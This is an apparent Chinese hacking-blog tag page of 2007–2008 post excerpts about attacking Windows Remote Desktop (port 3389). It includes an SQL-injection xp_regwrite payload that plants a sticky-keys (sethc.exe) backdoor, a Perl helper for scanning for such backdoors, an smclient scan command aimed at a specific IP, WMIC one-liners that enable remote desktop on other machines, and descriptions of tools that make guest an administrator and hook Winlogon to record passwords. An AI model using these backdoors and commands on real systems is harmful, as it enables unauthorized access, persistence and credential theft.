标签 ‘3389’ 下的日志

3389新思路

2008/10/28 22:38 | 鬼仔 | 技术文章 | 消灭0回复

版权所有:BK瞬间群
作者:BK群某饮料

1.能修改注册表
2.能访问3389

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--

阅读全文 »

Tags: ,

3389的SHIFT后门自动扫描[自动关闭错误连接]

2008/10/07 22:42 | 鬼仔 | 工具收集 | 消灭0回复

鬼仔注:3389的SHIFT后门自动扫描的补充

作者:cloie

#!/usr/bin/perl

use warnings;
use Win32::GUI;

use constant WM_CLOSE           => 16;

sub monitor {
my $handle = Win32::GUI::FindWindow('', '中断远程桌面连接');
Win32::GUI::SendMessage($handle, WM_CLOSE, 0, 0);
}
 阅读全文 »
Tags: ,

3389的SHIFT后门自动扫描

2008/09/15 13:41 | 鬼仔 | 工具收集 | 3 个回复

来源:cloie

首先3389的SHIFT后门极少
其次大部分SHIFT后门都加密

所以手工一个一个尝试是挺傻的,写成自动扫描的话,还能让人忍受
下载ftp://ftp.microsoft.com/ResKit/win2000/roboclient.zip
smclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d
阅读全文 »

Tags: ,

3389任意密码登陆(vb源码)

2008/05/31 18:27 | 鬼仔 | 工具收集 | 2 个回复

作者:open
来源:open’s blog

用VB写这种程序我觉得那个………
或许偶还菜吧…..
阅读全文 »

Tags: ,

xp下双开3389源码

2008/05/25 13:44 | 鬼仔 | 工具收集 | 6 个回复

作者:cooldiyer
来源:红狼

很早时候写的,方便大家用,代码丢了我也可以百度到
编译后,直接运行,XP的终端自动开启激活guest,密码为cooldiyer,加管理员组
并且可以多用户登录
声明,原创………………..
阅读全文 »

Tags: , ,

一句话开3389(只测试过2003)

2008/04/02 1:17 | 鬼仔 | 技术文章 | 消灭0回复

作者:lcx
来源:vbs小铺

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1

Tags:

xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs

2008/01/30 5:54 | 鬼仔 | 工具收集 | 消灭0回复

作者:孤狐浪子
来源:红狼

阅读全文 »

Tags: ,

Winlogon劫持记录3389密码小工具(开源代码)

2007/12/29 6:57 | 鬼仔 | 工具收集 | 1 个回复

文章作者:lovemfc
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

在得到system权限下,通常希望得到3389管理员密码,来进一步得到更多的信息,方便进一步的渗透。
gina木马比较不错,但是貌似win 2000少导出一个函数,用在win 2000下可能崩溃。
于是写了一个小工具,通过挂钩 msgina.dll WlxLoggedOutSAS 函数,记录登录帐户密码!
启动就用winlogon 通知包,当有3389,连上服务器时。新创建的 winlogon.exe 会在登录前加载,注册了 "Startup" 的dll,Hook 了函数,登录成功后,记录密码到 boot.dat 文件,并取消Hook。退出3389后,dll 文件即可删除。
阅读全文 »

Tags: , ,